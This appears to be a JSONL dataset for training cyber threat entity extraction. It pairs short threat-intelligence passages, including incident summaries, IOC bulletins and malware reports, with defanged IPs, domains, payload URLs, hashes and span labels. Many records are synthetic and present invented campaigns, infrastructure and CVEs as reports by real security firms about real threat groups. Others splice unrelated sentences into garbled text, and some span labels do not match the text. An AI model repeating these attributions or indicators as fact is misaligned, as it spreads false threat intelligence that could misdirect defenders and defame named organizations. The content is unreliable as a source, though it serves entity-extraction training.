{"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from info@login-portal[.]tech contained a link to hxxp://auth-sync[.]xyz/callback. This redirected to hxxp://mail-proxy[ . ]info/download/update.exe on staticauth[.]cc. A secondary email from service@mail-service[ . ]info pointed to hxxps://auth-auth[.]dev/portal/verify which delivered DanaBot. The final payload callback was hxxps://staticstatic[.]org/admin/config resolving to 172[.]213[.]162[.]245 via staticcdn[ . ]cc.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: info@login-portal.tech": [[84, 108]], "Indicator: hxxp://auth-sync.xyz/callback": [[129, 160]], "Indicator: hxxp://mail-proxy.info/download/update.exe": [[181, 227]], "Indicator: staticauth.cc": [[231, 246]], "Indicator: service@mail-service.info": [[271, 300]], "Indicator: https://auth-auth.dev/portal/verify": [[312, 349]], "Malware: DanaBot": [[366, 373]], "Indicator: hxxps://staticstatic.org/admin/config": [[406, 445]], "Indicator: 172.213.162.245": [[459, 480]], "Indicator: staticcdn.cc": [[485, 501]]}, "info": {"id": "synth_v2_01820", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 133 [ . ] 5 [ . ] 87 [ . ] 84, the Trend Micro IR team identified PikaBot running as C:\\Program Files\\Common Files\\beacon.dll. The threat actor, believed to be Lazarus Group, used Brute Ratel for credential harvesting and BloodHound for lateral movement. Exfiltrated data was sent to proxyapi[.]site and login-cloud[ . ]info. The initial dropper (SHA1: dc826857b57b6e8dd5b7a84ab9095cd7c98c725f) was delivered via a phishing email from notification@login-portal[ . ]tech. A second C2 node was observed at 101[.]80[.]56[.]34, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\implant.so.", "spans": {"Indicator: 133.5.87.84": [[64, 93]], "Organization: Trend Micro": [[99, 110]], "Malware: PikaBot": [[130, 137]], "Indicator: proxyapi.site": [[348, 363]], "Indicator: login-cloud.info": [[368, 388]], "Indicator: dc826857b57b6e8dd5b7a84ab9095cd7c98c725f": [[417, 457]], "Indicator: notification@login-portal.tech": [[499, 533]], "Indicator: 101.80.56.34": [[568, 586]]}, "info": {"id": "synth_v2_00311", "source": "defanged_augment"}}
{"text": "Volexity published a threat intelligence report linking TA505 to a new campaign exploiting CVE-2026-44676 in Citrix NetScaler. The attackers deployed XLoader via WinPEAS, establishing C2 communication with 172[.]111[.]29[.]149 and nodenode[.]org. A secondary payload was downloaded from hxxp://node-api[ . ]live/api/v2/auth. The malware binary (SHA1: 097e31987e1382d795ec15b2a2f758cf402ed1d6) was dropped to C:\\ProgramData\\helper.sh. Phishing emails were sent from service@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 192[.]160[.]29[.]13.", "spans": {"Organization: Volexity": [[0, 8]], "Vulnerability: CVE-2026-44676": [[91, 105]], "System: Citrix NetScaler": [[109, 125]], "Malware: XLoader": [[150, 157]], "Indicator: 172.111.29.149": [[206, 226]], "Indicator: nodenode.org": [[231, 245]], "Indicator: hxxp://node-api.live/api/v2/auth": [[287, 323]], "Indicator: 097e31987e1382d795ec15b2a2f758cf402ed1d6": [[351, 391]], "Indicator: service@secure-verify.net": [[465, 492]], "Indicator: 192.160.29.13": [[558, 577]]}, "info": {"id": "synth_v2_00005", "source": "defanged_augment"}}
{"text": "The Lazarus Group was first identified in Novetta’s report Operation Blockbuster in February 2016 . The Silence[ . ]Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": {"Organization: Novetta’s": [[42, 51]], "Indicator: Silence.Main Trojan": [[104, 127]]}, "info": {"id": "cyberner_stix_train_007030", "source": "defanged_augment"}}
{"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . APT33 : 91[.]235[.]142[.]76 mywinnetwork[ . ]ddns[ . ]net . It supports loading arbitrary .NET assemblies encoded as Base64 sent to it via chat comments .", "spans": {"Organization: US-CERT Code Analysis Team": [[119, 145]], "Malware: botnet controller": [[155, 172]], "Indicator: 91.235.142.76": [[197, 216]], "Indicator: mywinnetwork.ddns.net": [[217, 246]]}, "info": {"id": "cyberner_stix_train_003583", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at C:\\Windows\\Temp\\shell.php. Memory dump analysis confirmed execution of PowerShell Empire. Registry modifications pointed to persistence via /etc/cron.d/runtime.dll. Network forensics identified connections to 172[.]22[.]165[.]235 and storage-auth[ . ]live. Email headers traced the initial vector to info@auth-check[.]org. File C:\\Windows\\Tasks\\config.dat (SHA256: 4bf4c62d0406287a63ebac6599b1e026d392671bb6d6f0e7c30b367bdbb0621c) was identified as the initial dropper. A staging URL hxxp://storageedge[.]live/login resolved to 172[.]24[.]64[.]64. Secondary artifact hash: SHA256: 0275a4e5f4a35de4bfbf652741de4a489c4e4b4e5bc0a34ef4e09fa66cf4995b.", "spans": {"Indicator: 172.22.165.235": [[303, 323]], "Indicator: storage-auth.live": [[328, 349]], "Indicator: info@auth-check.org": [[394, 415]], "Indicator: 4bf4c62d0406287a63ebac6599b1e026d392671bb6d6f0e7c30b367bdbb0621c": [[459, 523]], "Indicator: http://storageedge.live/login": [[578, 609]], "Indicator: 172.24.64.64": [[622, 640]], "Indicator: 0275a4e5f4a35de4bfbf652741de4a489c4e4b4e5bc0a34ef4e09fa66cf4995b": [[675, 739]]}, "info": {"id": "synth_v2_01214", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Kaspersky GReAT identified a large-scale phishing operation. Emails originated from alert@auth-check[ . ]org and finance@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://proxy-mail[.]link/panel/index.html which hosted a credential harvesting page on apicdn[.]info. A secondary link hxxps://cloud-node[ . ]club/portal/verify delivered QakBot (SHA256: 1291e92e5bbba173be68a34922734af05b541ae39c6ac00fa6f54be47e0907f8). The malware was saved to C:\\ProgramData\\csrss.exe and established C2 with 99[.]174[.]38[.]176.", "spans": {"Organization: Kaspersky GReAT": [[26, 41]], "Indicator: alert@auth-check.org": [[110, 134]], "Indicator: finance@identity-verify.cc": [[139, 169]], "Indicator: hxxps://proxy-mail.link/panel/index.html": [[226, 268]], "Indicator: apicdn.info": [[314, 327]], "Indicator: hxxps://cloud-node.club/portal/verify": [[346, 387]], "Malware: QakBot": [[398, 404]], "Indicator: 1291e92e5bbba173be68a34922734af05b541ae39c6ac00fa6f54be47e0907f8": [[414, 478]], "Indicator: 99.174.38.176": [[555, 574]]}, "info": {"id": "synth_v2_01082", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Bebloh.Win32.427 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Injector.CMX TROJ_HPISDA.SM2 Trojan.Win32.NaKocTb.eiktob Trojan.Win32.Inject.213504 Troj.W32.Inject.tn8S BackDoor.Bebloh.272 TROJ_HPISDA.SM2 BehavesLike[.]Win32[.]Downloader[.]ch W32/Injector.UCTI-2382 Trojan.Inject.tpn Trojan/Win32.Inject Trojan.Strictor.D1C966 Backdoor:Win32/Carrotime.A Trojan/Win32.Inject.C1667127 Trj/RansomCrypt.J W32/Kryptik.FJVT!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[238, 275]]}, "info": {"id": "cyner2_train_005381", "source": "defanged_augment"}}
{"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play[.]google[.]com/store/apps/details ? Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL . APT33 : 213 [ . ] 252 [ . ] 244 [ . ] 14 service-avant[ . ]com . Individuals who have access to critical information or systems can easily choose to misuse that accessto the detriment of their organization .", "spans": {"Organization: U.S. Government": [[175, 190], [306, 321]], "Organization: DHS": [[202, 205]], "Organization: FBI": [[210, 213]], "Indicator: 213.252.244.14": [[343, 375]], "Indicator: service-avant.com": [[376, 397]], "Indicator: play.google.com": [[121, 140]]}, "info": {"id": "cyberner_stix_train_002118", "source": "defanged_augment"}}
{"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps . The OilRig group continues to be a persistent adversary group in the Middle East region . The oldest one from November 2019 , named \" Urgent[.]docx \" . Mandiant has identified zero - day exploitation of this vulnerability in the wild beginning in late August 2023 as well as n - day exploitation after Citrix ’s publication .", "spans": {"Malware: RuMMS": [[82, 87], [167, 172]], "Indicator: Urgent.docx": [[314, 327]], "Organization: Mandiant": [[332, 340]], "Vulnerability: zero - day exploitation": [[356, 379]]}, "info": {"id": "cyberner_stix_train_004081", "source": "defanged_augment"}}
{"text": "In this latest incident , the group registered a fake news domain , timesofindiaa[ . ]in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": {"Organization: government officials": [[167, 187]], "Organization: IT": [[296, 298]], "Organization: financial institutions": [[337, 359]], "Indicator: timesofindiaa.in": [[68, 88]]}, "info": {"id": "cyberner_stix_train_004369", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: AgentTesla (SHA256: df677d572c40267397d1aeb027a00e9f84eebe9c2959fd3754667e818bec7d32). Upon execution on VMware ESXi, the sample creates /opt/app/bin/dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 17[.]57[.]243[.]119 every 60 seconds and DNS queries to edgerelay[ . ]org. The second stage was fetched from hxxps://backup-proxy[.]online/download/update.exe and written to /etc/cron.d/implant.so. The payload uses PowerView-style techniques for defense evasion. A secondary hash (SHA256: 226710d90e5377a0c1b18f2ee7065fbfcbb471561c3756d0c8e69202a0995a6f) was extracted from the unpacked payload.", "spans": {"Malware: AgentTesla": [[25, 35]], "Indicator: df677d572c40267397d1aeb027a00e9f84eebe9c2959fd3754667e818bec7d32": [[45, 109]], "System: VMware ESXi": [[130, 141]], "Indicator: 17.57.243.119": [[262, 281]], "Indicator: edgerelay.org": [[318, 335]], "Indicator: https://backup-proxy.online/download/update.exe": [[371, 420]], "Indicator: 226710d90e5377a0c1b18f2ee7065fbfcbb471561c3756d0c8e69202a0995a6f": [[551, 615]]}, "info": {"id": "synth_v2_00498", "source": "defanged_augment"}}
{"text": "The system verifies the signature of the legitimate file while installing the malicious file . There has also been at least one victim targeted by a spear-phishing attack . In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR[.]exe . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": {"Indicator: C:\\ProgramData\\DRM\\CLR\\CLR.exe": [[212, 244]]}, "info": {"id": "cyberner_stix_train_000071", "source": "defanged_augment"}}
{"text": "Sophos X-Ops published a threat intelligence report linking FIN11 to a new campaign exploiting CVE-2025-46789 in Citrix NetScaler. The attackers deployed Play via CrackMapExec, establishing C2 communication with 192 [ . ] 195 [ . ] 116 [ . ] 107 and staticstorage[.]online. A secondary payload was downloaded from hxxp://cloud-login[.]cc/download/update.exe. The malware binary (MD5: 5005f8b01c76b47a142bb13e4b40d2a0) was dropped to C:\\Windows\\System32\\ntds.dit. Phishing emails were sent from noreply@document-share[ . ]link targeting enterprise users. A backup C2 server was identified at 192 [ . ] 78 [ . ] 218 [ . ] 249.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2025-46789": [[95, 109]], "System: Citrix NetScaler": [[113, 129]], "Malware: Play": [[154, 158]], "Indicator: 192.195.116.107": [[212, 245]], "Indicator: staticstorage.online": [[250, 272]], "Indicator: hxxp://cloud-login.cc/download/update.exe": [[314, 357]], "Indicator: 5005f8b01c76b47a142bb13e4b40d2a0": [[384, 416]], "Indicator: noreply@document-share.link": [[494, 525]], "Indicator: 192.78.218.249": [[591, 623]]}, "info": {"id": "synth_v2_00192", "source": "defanged_augment"}}
{"text": "Trend Micro published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2021-24446 in Cisco ASA. The attackers deployed SmokeLoader via PsExec, establishing C2 communication with 20[.]91[.]243[.]81 and proxy-cloud[ . ]xyz. A secondary payload was downloaded from hxxp://sync-cloud[ . ]xyz/wp-content/uploads/doc.php. The malware binary (SHA1: b9daf676c4627c3af9af734000aeea6542a64e70) was dropped to /etc/cron.d/payload.bin. Phishing emails were sent from alert@secure-verify[ . ]net targeting enterprise users. A backup C2 server was identified at 56[.]137[.]93[.]243.", "spans": {"Organization: Trend Micro": [[0, 11]], "Vulnerability: CVE-2021-24446": [[104, 118]], "System: Cisco ASA": [[122, 131]], "Malware: SmokeLoader": [[156, 167]], "Indicator: 20.91.243.81": [[215, 233]], "Indicator: proxy-cloud.xyz": [[238, 257]], "Indicator: hxxp://sync-cloud.xyz/wp-content/uploads/doc.php": [[299, 351]], "Indicator: b9daf676c4627c3af9af734000aeea6542a64e70": [[379, 419]], "Indicator: alert@secure-verify.net": [[492, 519]], "Indicator: 56.137.93.243": [[585, 604]]}, "info": {"id": "synth_v2_00166", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from confirm@urgent-notice[ . ]online and alert@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxp://api-static[ . ]org/collect which hosted a credential harvesting page on cacheedge[.]top. A secondary link hxxps://gatewayauth[.]online/secure/token delivered BumbleBee (SHA1: 5c4958bd7bcec41bf43116da1bac4fe213d801c1). The malware was saved to /home/user/.config/csrss.exe and established C2 with 46 [ . ] 8 [ . ] 77 [ . ] 180.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: confirm@urgent-notice.online": [[99, 131]], "Indicator: alert@mail-service.info": [[136, 161]], "Indicator: http://api-static.org/collect": [[218, 251]], "Indicator: cacheedge.top": [[297, 312]], "Indicator: hxxps://gatewayauth.online/secure/token": [[331, 372]], "Malware: BumbleBee": [[383, 392]], "Indicator: 5c4958bd7bcec41bf43116da1bac4fe213d801c1": [[400, 440]], "Indicator: 46.8.77.180": [[521, 550]]}, "info": {"id": "synth_v2_00874", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Hive Campaign:\nNetwork Indicators:\n- 172[.]207[.]86[.]136\n- 172[.]236[.]238[.]211\n- 218 [ . ] 253 [ . ] 25 [ . ] 22\n- cacherelay[ . ]org\n- nodelogin[.]dev\nURLs:\n- hxxp://gatewaystatic[ . ]dev/portal/verify\n- hxxp://updateproxy[ . ]online/admin/config\nEmail Senders:\n- ceo@document-share[.]link\n- it@identity-verify[.]cc\nFile Indicators:\n- SHA256: b2e8b42d7488ffc3ed65fe94f7748b7df0227c8c5e05d74360f5400c35490242\n- SHA256: 9dc3b4790af4f3e8359a4fc0a5aa0f948b1d62fa37d5ebe7fdc379644ce29eea\n- Drop path: C:\\Users\\Public\\Documents\\shell.php", "spans": {"Malware: Hive": [[15, 19]], "Indicator: 172.207.86.136": [[52, 72]], "Indicator: 172.236.238.211": [[75, 96]], "Indicator: 218.253.25.22": [[99, 130]], "Indicator: cacherelay.org": [[133, 151]], "Indicator: nodelogin.dev": [[154, 169]], "Indicator: http://gatewaystatic.dev/portal/verify": [[178, 220]], "Indicator: hxxp://updateproxy.online/admin/config": [[223, 265]], "Indicator: ceo@document-share.link": [[283, 308]], "Indicator: it@identity-verify.cc": [[311, 334]], "Indicator: b2e8b42d7488ffc3ed65fe94f7748b7df0227c8c5e05d74360f5400c35490242": [[362, 426]], "Indicator: 9dc3b4790af4f3e8359a4fc0a5aa0f948b1d62fa37d5ebe7fdc379644ce29eea": [[437, 501]]}, "info": {"id": "synth_v2_01374", "source": "defanged_augment"}}
{"text": "Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1[.]1[.]1[.]1 .", "spans": {"Indicator: 1.1.1.1": [[323, 336]]}, "info": {"id": "dnrti_train_003103", "source": "defanged_augment"}}
{"text": "Blog Post by Cisco Talos: Tracking Storm-0558's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-46789 against Barracuda ESG deployments. The initial access vector involves spear-phishing emails from billing@document-share[ . ]link delivering Latrodectus. Post-compromise, the attackers deploy Dridex and use Seatbelt for reconnaissance. C2 infrastructure includes 10[.]148[.]21[.]114 and proxy-cloud[ . ]com. A staging server at hxxp://apisync[.]link/collect hosts additional tooling. Key artifact: C:\\Windows\\Temp\\implant.so (SHA256: 475242e819fcd357b0b5d78c9b6e6f410039cd4d3d5695019321bbe14316c093).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2025-46789": [[125, 139]], "System: Barracuda ESG": [[148, 161]], "Indicator: billing@document-share.link": [[237, 268]], "Malware: Latrodectus": [[280, 291]], "Malware: Dridex": [[331, 337]], "Indicator: 10.148.21.114": [[402, 421]], "Indicator: proxy-cloud.com": [[426, 445]], "Indicator: hxxp://apisync.link/collect": [[467, 496]], "Indicator: 475242e819fcd357b0b5d78c9b6e6f410039cd4d3d5695019321bbe14316c093": [[573, 637]]}, "info": {"id": "synth_v2_01572", "source": "defanged_augment"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online[.]bankaustria[.]at.id8817469 [ .", "spans": {"Indicator: online.bankaustria.at": [[30, 55]]}, "info": {"id": "cyner_train_002694", "source": "defanged_augment"}}
{"text": "IOC Bulletin - RedLine Stealer Campaign:\nNetwork Indicators:\n- 10[.]135[.]38[.]140\n- 10[.]179[.]95[.]183\n- 99 [ . ] 82 [ . ] 184 [ . ] 38\n- secure-api[ . ]xyz\n- auth-gateway[ . ]online\nURLs:\n- hxxp://securenode[ . ]dev/download/update.exe\n- hxxps://proxyupdate[ . ]net/callback\nEmail Senders:\n- updates@urgent-notice[.]online\n- alert@secure-verify[.]net\nFile Indicators:\n- SHA1: b4bbff27cbeef0ca0ca2637799972820e3572c06\n- MD5: 606bb0202afe86276cb24369610ec191\n- Drop path: C:\\Program Files\\Common Files\\sam.hive", "spans": {"Malware: RedLine Stealer": [[15, 30]], "Indicator: 10.135.38.140": [[63, 82]], "Indicator: 10.179.95.183": [[85, 104]], "Indicator: 99.82.184.38": [[107, 137]], "Indicator: secure-api.xyz": [[140, 158]], "Indicator: auth-gateway.online": [[161, 184]], "Indicator: hxxp://securenode.dev/download/update.exe": [[193, 238]], "Indicator: hxxps://proxyupdate.net/callback": [[241, 277]], "Indicator: updates@urgent-notice.online": [[295, 325]], "Indicator: alert@secure-verify.net": [[328, 353]], "Indicator: b4bbff27cbeef0ca0ca2637799972820e3572c06": [[379, 419]], "Indicator: 606bb0202afe86276cb24369610ec191": [[427, 459]]}, "info": {"id": "synth_v2_01438", "source": "defanged_augment"}}
{"text": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.  The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft[ . ]NET\\Framework\\v<version>\\InstallUtil.exe and C:\\Windows\\Microsoft[ . ]NET\\Framework64\\v<version>\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].", "spans": {"System: Windows": [[77, 84]], "System: .NET": [[249, 253]], "Organization: Microsoft": [[320, 329]], "Indicator: Microsoft.NET": [[398, 415], [468, 485]]}, "info": {"source": "defanged_augment", "mitre_id": "T1218.004"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxbf_gige: stop interface during shutdown\n\nThe mlxbf_gige driver intermittantly encounters a NULL pointer\nexception while the system is shutting down via \"reboot\" command.\nThe mlxbf_driver will experience an exception right after executing\nits shutdown() method.  One example of this exception is:\n\nUnable to handle kernel NULL pointer dereference at virtual address 0000000000000070\nMem abort info:\n  ESR = 0x0000000096000004\n  EC = 0x25: DABT (current EL), IL = 32 bits\n  SET = 0, FnV = 0\n  EA = 0, S1PTW = 0\n  FSC = 0x04: level 0 translation fault\nData abort info:\n  ISV = 0, ISS = 0x00000004\n  CM = 0, WnR = 0\nuser pgtable: 4k pages, 48-bit VAs, pgdp=000000011d373000\n[0000000000000070] pgd=0000000000000000, p4d=0000000000000000\nInternal error: Oops: 96000004 [#1] SMP\nCPU: 0 PID: 13 Comm: ksoftirqd/0 Tainted: G S         OE     5.15.0-bf.6.gef6992a #1\nHardware name: hxxps://www[.]mellanox[.]com BlueField SoC/BlueField SoC, BIOS 4.0.2.12669 Apr 21 2023\npstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige]\nlr : mlxbf_gige_poll+0x54/0x160 [mlxbf_gige]\nsp : ffff8000080d3c10\nx29: ffff8000080d3c10 x28: ffffcce72cbb7000 x27: ffff8000080d3d58\nx26: ffff0000814e7340 x25: ffff331cd1a05000 x24: ffffcce72c4ea008\nx23: ffff0000814e4b40 x22: ffff0000814e4d10 x21: ffff0000814e4128\nx20: 0000000000000000 x19: ffff0000814e4a80 x18: ffffffffffffffff\nx17: 000000000000001c x16: ffffcce72b4553f4 x15: ffff80008805b8a7\nx14: 0000000000000000 x13: 0000000000000030 x12: 0101010101010101\nx11: 7f7f7f7f7f7f7f7f x10: c2ac898b17576267 x9 : ffffcce720fa5404\nx8 : ffff000080812138 x7 : 0000000000002e9a x6 : 0000000000000080\nx5 : ffff00008de3b000 x4 : 0000000000000000 x3 : 0000000000000001\nx2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000\nCall trace:\n mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige]\n mlxbf_gige_poll+0x54/0x160 [mlxbf_gige]\n __napi_poll+0x40/0x1c8\n net_rx_action+0x314/0x3a0\n __do_softirq+0x128/0x334\n run_ksoftirqd+0x54/0x6c\n smpboot_thread_fn+0x14c/0x190\n kthread+0x10c/0x110\n ret_from_fork+0x10/0x20\nCode: 8b070000 f9000ea0 f95056c0 f86178a1 (b9407002)\n---[ end trace 7cc3941aa0d8e6a4 ]---\nKernel panic - not syncing: Oops: Fatal exception in interrupt\nKernel Offset: 0x4ce722520000 from 0xffff800008000000\nPHYS_OFFSET: 0x80000000\nCPU features: 0x000005c1,a3330e5a\nMemory Limit: none\n---[ end Kernel panic - not syncing: Oops: Fatal exception in interrupt ]---\n\nDuring system shutdown, the mlxbf_gige driver's shutdown() is always executed.\nHowever, the driver's stop() method will only execute if networking interface\nconfiguration logic within the Linux distribution has been setup to do so.\n\nIf shutdown() executes but stop() does not execute, NAPI remains enabled\nand this can lead to an exception if NAPI is scheduled while the hardware\ninterface has only been partially deinitialized.\n\nThe networking interface managed by the mlxbf_gige driver must be properly\nstopped during system shutdown so that IFF_UP is cleared, the hardware\ninterface is put into a clean state, and NAPI is fully deinitialized.", "spans": {"Indicator: https://www.mellanox.com": [[944, 972]], "System: Linux kernel": [[7, 19]], "System: Linux": [[2718, 2723]], "Vulnerability: NULL pointer dereference": [[393, 417]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35885"}}
{"text": "Malware Analysis Report: BlackCat (SHA256: a2837586defebc5f521c6637fd98afa5f4fa8cbbe82e0122671bdb47e5d4f1e2). Upon execution on MOVEit Transfer, the sample creates /tmp/ntds.dit and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 188 [ . ] 152 [ . ] 30 every 60 seconds and DNS queries to portalportal[ . ]info. The second stage was fetched from hxxp://updatestorage[.]online/login and written to C:\\Windows\\System32\\sam.hive. The payload uses Havoc-style techniques for defense evasion. A secondary hash (SHA256: 0d9601027c507910bee629f13b57523d7434ba9dee24d933013c0728429f48cc) was extracted from the unpacked payload.", "spans": {"Malware: BlackCat": [[25, 33]], "Indicator: a2837586defebc5f521c6637fd98afa5f4fa8cbbe82e0122671bdb47e5d4f1e2": [[43, 107]], "System: MOVEit Transfer": [[128, 143]], "Indicator: 192.188.152.30": [[253, 285]], "Indicator: portalportal.info": [[322, 343]], "Indicator: hxxp://updatestorage.online/login": [[379, 414]], "Indicator: 0d9601027c507910bee629f13b57523d7434ba9dee24d933013c0728429f48cc": [[547, 611]]}, "info": {"id": "synth_v2_00601", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-34807 is a critical cross-site scripting affecting Fortinet FortiGate. Microsoft MSRC confirmed active exploitation by Gamaredon in the wild. Exploitation delivers IcedID (SHA256: 7098c8a6063d5b46574f7562136200aafd24c2c5205ab16d424a1d97131f4e5a) which is dropped to C:\\Users\\admin\\Desktop\\svchost.exe. The exploit payload is hosted at hxxp://proxybackup[ . ]site/secure/token and communicates to 47 [ . ] 231 [ . ] 219 [ . ] 247 for C2.", "spans": {"Vulnerability: CVE-2022-34807": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: Fortinet FortiGate": [[84, 102]], "Organization: Microsoft MSRC": [[104, 118]], "Malware: IcedID": [[197, 203]], "Indicator: 7098c8a6063d5b46574f7562136200aafd24c2c5205ab16d424a1d97131f4e5a": [[213, 277]], "Indicator: hxxp://proxybackup.site/secure/token": [[368, 408]], "Indicator: 47.231.219.247": [[429, 461]]}, "info": {"id": "synth_v2_00756", "source": "defanged_augment"}}
{"text": "In September 2024, Kaspersky researchers documented coordinated attacks by Head Mare and Twelve against Russian organizations. Head Mare deployed CobInt, previously exclusive to Twelve, and their custom backdoor PhantomJitter. The attackers used LockBit 3.0 for Windows ransomware encryption and Babuk for NAS ransomware. Credential dumping relied on mimikatz, secretsdump, and ProcDump. Tunneling was achieved via cloudflared, Gost, Localtonet, ngrok, and revsocks. The C2 domain 360nvidia[ . ]com resolved to 45 [ . ] 156 [ . ] 27 [ . ] 115, with additional C2 servers at 45 [ . ] 156 [ . ] 21 [ . ] 148, 45 [ . ] 87 [ . ] 246 [ . ] 34, 185[.]158[.]248[.]107, 185 [ . ] 229 [ . ] 9 [ . ] 27, and 64 [ . ] 7 [ . ] 198 [ . ] 109. Another C2 domain was web-telegram[ . ]uk. PhantomJitter was downloaded from hxxp://45[ . ]87[ . ]246[ . ]34:443/calc.exe and hxxp://185[.]158[.]248[.]107:443/calc.exe. The attackers exploited CVE-2023-38831 in WinRAR and CVE-2021-26855 in Microsoft Exchange. Persistence used services named winsw and winuac. Malicious files were placed at C:\\Windows\\System32\\winsw.exe, C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs, and C:\\Windows\\System32\\inetsrv\\calc.exe. Lateral movement relied on PSExec, smbexec, and wmiexec. Network scanning used fscan and SoftPerfect Network Scanner. Data exfiltration used rclone through SFTP.", "spans": {"Organization: Kaspersky": [[19, 28]], "Malware: CobInt": [[146, 152]], "Malware: PhantomJitter": [[212, 225], [773, 786]], "Malware: LockBit 3.0": [[246, 257]], "Malware: Babuk": [[296, 301]], "Indicator: 360nvidia.com": [[481, 498]], "Indicator: 45.156.27.115": [[511, 542]], "Indicator: 45.156.21.148": [[574, 605]], "Indicator: 45.87.246.34": [[607, 637]], "Indicator: 185.158.248.107": [[639, 660]], "Indicator: 185.229.9.27": [[662, 692]], "Indicator: 64.7.198.109": [[698, 728]], "Indicator: web-telegram.uk": [[752, 771]], "Indicator: http://45.87.246.34:443/calc.exe": [[807, 851]], "Indicator: http://185.158.248.107:443/calc.exe": [[856, 897]], "Vulnerability: CVE-2023-38831": [[923, 937]], "System: WinRAR": [[941, 947]], "Vulnerability: CVE-2021-26855": [[952, 966]], "System: Microsoft Exchange": [[970, 988]]}, "info": {"id": "malware_00001", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Ligolo artifacts at /opt/app/bin/implant.so. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\beacon.dll. Network forensics identified connections to 32 [ . ] 103 [ . ] 2 [ . ] 10 and backupstatic[.]top. Email headers traced the initial vector to service@urgent-notice[ . ]online. File C:\\Users\\admin\\Desktop\\winlogon.exe (SHA256: c8d1cfcb22d50aa34fd40e7c62b855957fe926c728c17877116891b69b795192) was identified as the initial dropper. A staging URL hxxps://gatewayrelay[.]cc/gate.php resolved to 71 [ . ] 69 [ . ] 233 [ . ] 55. Secondary artifact hash: MD5: 63d2cf9b70a62ca2470dfdea68f8dff7.", "spans": {"Indicator: 32.103.2.10": [[304, 333]], "Indicator: backupstatic.top": [[338, 356]], "Indicator: service@urgent-notice.online": [[401, 433]], "Indicator: c8d1cfcb22d50aa34fd40e7c62b855957fe926c728c17877116891b69b795192": [[485, 549]], "Indicator: https://gatewayrelay.cc/gate.php": [[604, 638]], "Indicator: 71.69.233.55": [[651, 681]], "Indicator: 63d2cf9b70a62ca2470dfdea68f8dff7": [[713, 745]]}, "info": {"id": "synth_v2_01140", "source": "defanged_augment"}}
{"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX . OceanLotus : background[ . ]ristians[ . ]com:8888 11b4 . They contain some invalid URLs and IPs .", "spans": {"Indicator: background.ristians.com:8888": [[357, 393]]}, "info": {"id": "cyberner_stix_train_005272", "source": "defanged_augment"}}
